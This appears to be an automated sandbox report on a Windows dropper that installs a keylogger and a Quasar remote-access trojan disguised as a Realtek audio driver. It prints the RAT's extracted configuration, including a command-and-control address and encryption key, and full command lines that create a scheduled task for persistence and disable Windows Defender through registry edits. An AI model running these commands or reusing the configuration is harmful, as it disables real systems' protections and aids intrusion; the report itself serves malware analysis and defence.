Analysis
-
max time kernel
23s -
max time network
29s -
platform
windows7_x64 -
resource
win7-en-20211104 -
submitted
06-12-2021 06:33
Static task
static1
Behavioral task
behavioral1
Sample
05603775ae6c66c7207556660da29de4.exe
Resource
win7-en-20211104
General
-
Target
05603775ae6c66c7207556660da29de4.exe
-
Size
13.8MB
-
MD5
05603775ae6c66c7207556660da29de4
-
SHA1
96f1bed1e99e6cd51c4973a8b586f08097009c15
-
SHA256
09ac2a0cc0277beb2b85f5d29b4531e65fb1a25e126f89b8a5ad6d0ba04ef369
-
SHA512
7aa7620eda7d2a369414abb6d94671a3b8f039d4fce6dabedcc1daba1c0f91468555512dc7827e050b61168a77a4c2f8636eb8ba4a26b399c22a88709d8c5326
Malware Config
Extracted
quasar
2.8.0.1
Driver
134.255.220.204:4782
6IzunZymIRucbMwSQj
-
encryption_key
85wBI2y5JEbQcrqb3u8l
-
install_name
Driver.exe
-
log_directory
Driver
-
reconnect_delay
1000
-
startup_key
Realtek® High Definition Audio Driver
-
subdirectory
Realtek® High Definition Audio Driver
Signatures
-
Quasar Payload 4 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Roaming\rat v6.exe family_quasar C:\Users\Admin\AppData\Roaming\rat v6.exe family_quasar C:\Users\Admin\AppData\Roaming\rat v6.exe family_quasar C:\Users\Admin\AppData\Roaming\rat v6.exe family_quasar -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral1/memory/544-96-0x000000001B510000-0x000000001B84B000-memory.dmp WebBrowserPassView -
Nirsoft 1 IoCs
Processes:
resource yara_rule behavioral1/memory/544-96-0x000000001B510000-0x000000001B84B000-memory.dmp Nirsoft -
Executes dropped EXE 5 IoCs
Processes:
keylogger py best.exerat v6.exeloader.exeRtkBtManServ.exerat v6.exepid process 1636 keylogger py best.exe 1500 rat v6.exe 1488 loader.exe 544 RtkBtManServ.exe 1888 rat v6.exe -
Loads dropped DLL 4 IoCs
Processes:
05603775ae6c66c7207556660da29de4.exekeylogger py best.exepid process 776 05603775ae6c66c7207556660da29de4.exe 776 05603775ae6c66c7207556660da29de4.exe 776 05603775ae6c66c7207556660da29de4.exe 1636 keylogger py best.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 4 ip-api.com -
Drops file in System32 directory 4 IoCs
Processes:
rat v6.exeDriver.exedescription ioc process File created C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe rat v6.exe File opened for modification C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe rat v6.exe File opened for modification C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe Driver.exe File opened for modification C:\Windows\SysWOW64\Realtek® High Definition Audio Driver Driver.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
loader.exepid process 1488 loader.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 1956 schtasks.exe 1508 schtasks.exe 1920 schtasks.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
loader.exeDriver.exepid process 1488 loader.exe 1488 loader.exe 1488 loader.exe 1488 loader.exe 1488 loader.exe 1488 loader.exe 1488 loader.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe 1316 Driver.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
rat v6.exeRtkBtManServ.exeDriver.exedescription pid process Token: SeDebugPrivilege 1500 rat v6.exe Token: SeDebugPrivilege 544 RtkBtManServ.exe Token: SeDebugPrivilege 1316 Driver.exe Token: SeDebugPrivilege 1316 Driver.exe -
Suspicious use of WriteProcessMemory 60 IoCs
Processes:
05603775ae6c66c7207556660da29de4.exekeylogger py best.exerat v6.execmd.exeDriver.exedescription pid process target process PID 776 wrote to memory of 1636 776 05603775ae6c66c7207556660da29de4.exe keylogger py best.exe PID 776 wrote to memory of 1636 776 05603775ae6c66c7207556660da29de4.exe keylogger py best.exe PID 776 wrote to memory of 1636 776 05603775ae6c66c7207556660da29de4.exe keylogger py best.exe PID 776 wrote to memory of 1636 776 05603775ae6c66c7207556660da29de4.exe keylogger py best.exe PID 776 wrote to memory of 1500 776 05603775ae6c66c7207556660da29de4.exe rat v6.exe PID 776 wrote to memory of 1500 776 05603775ae6c66c7207556660da29de4.exe rat v6.exe PID 776 wrote to memory of 1500 776 05603775ae6c66c7207556660da29de4.exe rat v6.exe PID 776 wrote to memory of 1500 776 05603775ae6c66c7207556660da29de4.exe rat v6.exe PID 776 wrote to memory of 1488 776 05603775ae6c66c7207556660da29de4.exe loader.exe PID 776 wrote to memory of 1488 776 05603775ae6c66c7207556660da29de4.exe loader.exe PID 776 wrote to memory of 1488 776 05603775ae6c66c7207556660da29de4.exe loader.exe PID 776 wrote to memory of 1488 776 05603775ae6c66c7207556660da29de4.exe loader.exe PID 1636 wrote to memory of 544 1636 keylogger py best.exe RtkBtManServ.exe PID 1636 wrote to memory of 544 1636 keylogger py best.exe RtkBtManServ.exe PID 1636 wrote to memory of 544 1636 keylogger py best.exe RtkBtManServ.exe PID 1636 wrote to memory of 544 1636 keylogger py best.exe RtkBtManServ.exe PID 1500 wrote to memory of 1956 1500 rat v6.exe schtasks.exe PID 1500 wrote to memory of 1956 1500 rat v6.exe schtasks.exe PID 1500 wrote to memory of 1956 1500 rat v6.exe schtasks.exe PID 1500 wrote to memory of 1956 1500 rat v6.exe schtasks.exe PID 1500 wrote to memory of 1720 1500 rat v6.exe cmd.exe PID 1500 wrote to memory of 1720 1500 rat v6.exe cmd.exe PID 1500 wrote to memory of 1720 1500 rat v6.exe cmd.exe PID 1500 wrote to memory of 1720 1500 rat v6.exe cmd.exe PID 1720 wrote to memory of 1692 1720 cmd.exe chcp.com PID 1720 wrote to memory of 1692 1720 cmd.exe chcp.com PID 1720 wrote to memory of 1692 1720 cmd.exe chcp.com PID 1720 wrote to memory of 1692 1720 cmd.exe chcp.com PID 1720 wrote to memory of 844 1720 cmd.exe PING.EXE PID 1720 wrote to memory of 844 1720 cmd.exe PING.EXE PID 1720 wrote to memory of 844 1720 cmd.exe PING.EXE PID 1720 wrote to memory of 844 1720 cmd.exe PING.EXE PID 1720 wrote to memory of 1888 1720 cmd.exe rat v6.exe PID 1720 wrote to memory of 1888 1720 cmd.exe rat v6.exe PID 1720 wrote to memory of 1888 1720 cmd.exe rat v6.exe PID 1720 wrote to memory of 1888 1720 cmd.exe rat v6.exe PID 1316 wrote to memory of 1920 1316 Driver.exe schtasks.exe PID 1316 wrote to memory of 1920 1316 Driver.exe schtasks.exe PID 1316 wrote to memory of 1920 1316 Driver.exe schtasks.exe PID 1316 wrote to memory of 1920 1316 Driver.exe schtasks.exe PID 1316 wrote to memory of 984 1316 Driver.exe explorer.exe PID 1316 wrote to memory of 984 1316 Driver.exe explorer.exe PID 1316 wrote to memory of 984 1316 Driver.exe explorer.exe PID 1316 wrote to memory of 984 1316 Driver.exe explorer.exe PID 1316 wrote to memory of 1796 1316 Driver.exe WScript.exe PID 1316 wrote to memory of 1796 1316 Driver.exe WScript.exe PID 1316 wrote to memory of 1796 1316 Driver.exe WScript.exe PID 1316 wrote to memory of 1796 1316 Driver.exe WScript.exe PID 1316 wrote to memory of 1360 1316 Driver.exe WScript.exe PID 1316 wrote to memory of 1360 1316 Driver.exe WScript.exe PID 1316 wrote to memory of 1360 1316 Driver.exe WScript.exe PID 1316 wrote to memory of 1360 1316 Driver.exe WScript.exe PID 1316 wrote to memory of 1948 1316 Driver.exe conhost.exe PID 1316 wrote to memory of 1948 1316 Driver.exe conhost.exe PID 1316 wrote to memory of 1948 1316 Driver.exe conhost.exe PID 1316 wrote to memory of 1948 1316 Driver.exe conhost.exe PID 1316 wrote to memory of 1572 1316 Driver.exe conhost.exe PID 1316 wrote to memory of 1572 1316 Driver.exe conhost.exe PID 1316 wrote to memory of 1572 1316 Driver.exe conhost.exe PID 1316 wrote to memory of 1572 1316 Driver.exe conhost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\05603775ae6c66c7207556660da29de4.exe"C:\Users\Admin\AppData\Local\Temp\05603775ae6c66c7207556660da29de4.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\keylogger py best.exe"C:\Users\Admin\AppData\Roaming\keylogger py best.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4gbUNbdjDVoEzuwe9QI1beMhUDwpgbq9t8eYqac7ixuzdX2esxhonYoBWN9FbGupbkub/9oCF5YryYcksMtSymyriBd/PbXKARudWjYmyujJNq14nt3KQdYmw2VrgARL8=3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\rat v6.exe"C:\Users\Admin\AppData\Roaming\rat v6.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Realtek® High Definition Audio Driver" /sc ONLOGON /tr "C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\メム尺ムフ丂刀ノ乃ムリリキノレひ.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650014⤵
-
C:\Windows\SysWOW64\PING.EXEping -\Common 10 localhost4⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Roaming\rat v6.exe"C:\Users\Admin\AppData\Roaming\rat v6.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Realtek® High Definition Audio Driver" /sc ONLOGON /tr "C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe" /rl HIGHEST /f5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe"C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe"5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Realtek® High Definition Audio Driver" /sc ONLOGON /tr "C:\Windows\SysWOW64\Realtek® High Definition Audio Driver\Driver.exe" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Local\Execution.vbs6⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution2.vbs"6⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution5.vbs"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f6⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\ムレり尺キリリりリ√りゐノア尺ᄃ.bat" "6⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\ᄃノ乃ズフイ√んノ乇ム√乙刀ᄃᄃ.bat" "5⤵
-
C:\Windows\SysWOW64\chcp.comchcp 650016⤵
-
C:\Users\Admin\AppData\Roaming\loader.exe"C:\Users\Admin\AppData\Roaming\loader.exe"2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution.vbs"2⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1328126241991120274-1561569992253893810-1445296795-2367036713013149801217809446"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1400704528-11540688901002455783666105746-521151200-2967132471009405368-11829814"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Execution.vbsMD5
a76dc4fbd53fe8d087cb78ff16134a26
SHA18f565d5b491f4f7b27e6af34bb7798f9b5bb558b
SHA256b15dbb3f1554b1e6b0a66423df0a205b157276e2e3d31d7a1c7dd480d615e1e6
SHA51269de3d0f22c921f07e0db2324d4dfcec717a1cdcb47b24f19a53d21f7876b9099ff1a7e44ae037c38e1cc864d53b8ecac45c8b376bd7e497dd745c4347307470
-
C:\Users\Admin\AppData\Local\Execution2.vbsMD5
cf1d37e3ccdde125c06f1383c88d9358
SHA1dcb51cbdab941e7cec28817ffae2fba1f27f1931
SHA25635873184c68848d8275eea24d4484870cad72972c34e4c553786fec6f4321d7a
SHA512dade8e3835b9f4b317ab2a7e4e52b4df619b4e1ccb3ede46d90a440b77da1f9ffb30804e5b889c866661122f16b6a44319b71ddaf277f4bb43acf24f076b3d0b
-
C:\Users\Admin\AppData\Local\Execution5.vbsMD5
05a460cc05b28e1fc6ee9aadd0e2e7b1
SHA14ac79e93d6467e809acfbb2a5b0370537fb99460
SHA2562e841a3b2fcb2f3e5f87a25656a85cd6ea8bd9c04421ac636239fccc5f7cc7a9
SHA512471f54955d054cfe3b2f23a801e84f7261e70271c18bc9bba736cab948a6c4544b62b40f318d4a55df29e3e640f0529432fe7b69822238dbbcec222da86b13f7
-
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exeMD5
88ab0bb59b0b20816a833ba91c1606d3
SHA172c09b7789a4bac8fee41227d101daed8437edeb
SHA256f4fb42c8312a6002a8783e2a1ab4571eb89e92cd192b1a21e8c4582205c37312
SHA51205cff2ca00ba940d9371c469bce6ffb4795c845d77525b8a1d4919f708296e66c0a6f3143c5964f5e963955e4f527a70624651113e72dc977f5ef40fa0276857
-
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exeMD5
88ab0bb59b0b20816a833ba91c1606d3
SHA172c09b7789a4bac8fee41227d101daed8437edeb
SHA256f4fb42c8312a6002a8783e2a1ab4571eb89e92cd192b1a21e8c4582205c37312
SHA51205cff2ca00ba940d9371c469bce6ffb4795c845d77525b8a1d4919f708296e66c0a6f3143c5964f5e963955e4f527a70624651113e72dc977f5ef40fa0276857
-
C:\Users\Admin\AppData\Local\Temp\メム尺ムフ丂刀ノ乃ムリリキノレひ.batMD5
915635b483fd0ad042568d6d85a185c0
SHA10b6524eaad0ad392594b7dad1461fc6864838ce9
SHA256d1ff0e80092079bc0fbf70a0249cb9955f67d83ec402deea359c07c5f37f8890
SHA512d1bb91efe6cf70019fb3d7cec3723c9ca8fd036c2c5fbfdde46f7f7d8883775bba8a6b14f7c9ef4bee4771ed1b8992b1fa9aeb65b608476edbd8e7bb124955fe
-
C:\Users\Admin\AppData\Roaming\keylogger py best.exeMD5
a20d50809d850ea9621ec8056ca52ee9
SHA147cd25041ec4a8c2ef397c2afd09fd2aaf6d3cd7
SHA256ceeedbfa74c764a7a927e33d3a8fe3fd6f2de12af2a7d9e0558062c3afa0581f
SHA5120f5b564403149bb0ca7851e989b433f00152ec9a95e0c52f4f3fc86f29832cc803c4969b4d06c1823b436facd6d987c448d5c640f01cc011025abe21a523643f
-
C:\Users\Admin\AppData\Roaming\keylogger py best.exeMD5
a20d50809d850ea9621ec8056ca52ee9
SHA147cd25041ec4a8c2ef397c2afd09fd2aaf6d3cd7
SHA256ceeedbfa74c764a7a927e33d3a8fe3fd6f2de12af2a7d9e0558062c3afa0581f
SHA5120f5b564403149bb0ca7851e989b433f00152ec9a95e0c52f4f3fc86f29832cc803c4969b4d06c1823b436facd6d987c448d5c640f01cc011025abe21a523643f
-
C:\Users\Admin\AppData\Roaming\loader.exeMD5
cd8ab729965533ed53755d09ad10c790
SHA1d09623a311dad9eb598cd2ef234ea1d6bfaf318e
SHA2569e8d78ad8a4a11f3904d7cb5b06d08ffdb73262f2f44d810e5b5b6dcb15c736f
SHA512834714dbbad108be2c1a52f0338782b4fee10b9ab999526dd175b338fe98b58857e36104a5300e989ae9bfa1e7432004ab5a5d422c9d23067941457f7abc6b0f
-
C:\Users\Admin\AppData\Roaming\loader.exeMD5
cd8ab729965533ed53755d09ad10c790
SHA1d09623a311dad9eb598cd2ef234ea1d6bfaf318e
SHA2569e8d78ad8a4a11f3904d7cb5b06d08ffdb73262f2f44d810e5b5b6dcb15c736f
SHA512834714dbbad108be2c1a52f0338782b4fee10b9ab999526dd175b338fe98b58857e36104a5300e989ae9bfa1e7432004ab5a5d422c9d23067941457f7abc6b0f
-
C:\Users\Admin\AppData\Roaming\rat v6.exeMD5
8a177113878be7de28f07a9f2b2bd56a
SHA1355d23771a07b4c6aaf86c6c28eb61f873b7e000
SHA25626fd51dc28ce76d5aa5914bdf6f9cac0a6afd41d1f13c9af2c299f92e339216d
SHA5121407fc16318918f0314bcf8ad9c5c7e2690f7fd3260246b93e131f83ff355cc52528e1cd13cd2ef809000673b070508ae0b675de4554090fac8483be8ffe6b6b
-
C:\Users\Admin\AppData\Roaming\rat v6.exeMD5
8a177113878be7de28f07a9f2b2bd56a
SHA1355d23771a07b4c6aaf86c6c28eb61f873b7e000
SHA25626fd51dc28ce76d5aa5914bdf6f9cac0a6afd41d1f13c9af2c299f92e339216d
SHA5121407fc16318918f0314bcf8ad9c5c7e2690f7fd3260246b93e131f83ff355cc52528e1cd13cd2ef809000673b070508ae0b675de4554090fac8483be8ffe6b6b
-
C:\Users\Admin\AppData\Roaming\rat v6.exeMD5
8a177113878be7de28f07a9f2b2bd56a
SHA1355d23771a07b4c6aaf86c6c28eb61f873b7e000
SHA25626fd51dc28ce76d5aa5914bdf6f9cac0a6afd41d1f13c9af2c299f92e339216d
SHA5121407fc16318918f0314bcf8ad9c5c7e2690f7fd3260246b93e131f83ff355cc52528e1cd13cd2ef809000673b070508ae0b675de4554090fac8483be8ffe6b6b
-
\Users\Admin\AppData\Local\Temp\RtkBtManServ.exeMD5
88ab0bb59b0b20816a833ba91c1606d3
SHA172c09b7789a4bac8fee41227d101daed8437edeb
SHA256f4fb42c8312a6002a8783e2a1ab4571eb89e92cd192b1a21e8c4582205c37312
SHA51205cff2ca00ba940d9371c469bce6ffb4795c845d77525b8a1d4919f708296e66c0a6f3143c5964f5e963955e4f527a70624651113e72dc977f5ef40fa0276857
-
\Users\Admin\AppData\Roaming\keylogger py best.exeMD5
a20d50809d850ea9621ec8056ca52ee9
SHA147cd25041ec4a8c2ef397c2afd09fd2aaf6d3cd7
SHA256ceeedbfa74c764a7a927e33d3a8fe3fd6f2de12af2a7d9e0558062c3afa0581f
SHA5120f5b564403149bb0ca7851e989b433f00152ec9a95e0c52f4f3fc86f29832cc803c4969b4d06c1823b436facd6d987c448d5c640f01cc011025abe21a523643f
-
\Users\Admin\AppData\Roaming\loader.exeMD5
cd8ab729965533ed53755d09ad10c790
SHA1d09623a311dad9eb598cd2ef234ea1d6bfaf318e
SHA2569e8d78ad8a4a11f3904d7cb5b06d08ffdb73262f2f44d810e5b5b6dcb15c736f
SHA512834714dbbad108be2c1a52f0338782b4fee10b9ab999526dd175b338fe98b58857e36104a5300e989ae9bfa1e7432004ab5a5d422c9d23067941457f7abc6b0f
-
\Users\Admin\AppData\Roaming\rat v6.exeMD5
8a177113878be7de28f07a9f2b2bd56a
SHA1355d23771a07b4c6aaf86c6c28eb61f873b7e000
SHA25626fd51dc28ce76d5aa5914bdf6f9cac0a6afd41d1f13c9af2c299f92e339216d
SHA5121407fc16318918f0314bcf8ad9c5c7e2690f7fd3260246b93e131f83ff355cc52528e1cd13cd2ef809000673b070508ae0b675de4554090fac8483be8ffe6b6b
-
memory/544-99-0x000000001B490000-0x000000001B492000-memory.dmpFilesize
8KB
-
memory/544-98-0x0000000000E70000-0x0000000000F1C000-memory.dmpFilesize
688KB
-
memory/544-84-0x0000000000000000-mapping.dmp
-
memory/544-96-0x000000001B510000-0x000000001B84B000-memory.dmpFilesize
3.2MB
-
memory/544-97-0x00000000002C0000-0x00000000002C1000-memory.dmpFilesize
4KB
-
memory/544-88-0x00000000010C0000-0x00000000010C1000-memory.dmpFilesize
4KB
-
memory/592-116-0x0000000000000000-mapping.dmp
-
memory/776-55-0x0000000075BB1000-0x0000000075BB3000-memory.dmpFilesize
8KB
-
memory/776-56-0x0000000002F70000-0x0000000002F71000-memory.dmpFilesize
4KB
-
memory/828-137-0x0000000000000000-mapping.dmp
-
memory/844-93-0x0000000000000000-mapping.dmp
-
memory/920-131-0x0000000000000000-mapping.dmp
-
memory/984-105-0x0000000000000000-mapping.dmp
-
memory/984-108-0x000000006F001000-0x000000006F003000-memory.dmpFilesize
8KB
-
memory/1044-122-0x0000000000000000-mapping.dmp
-
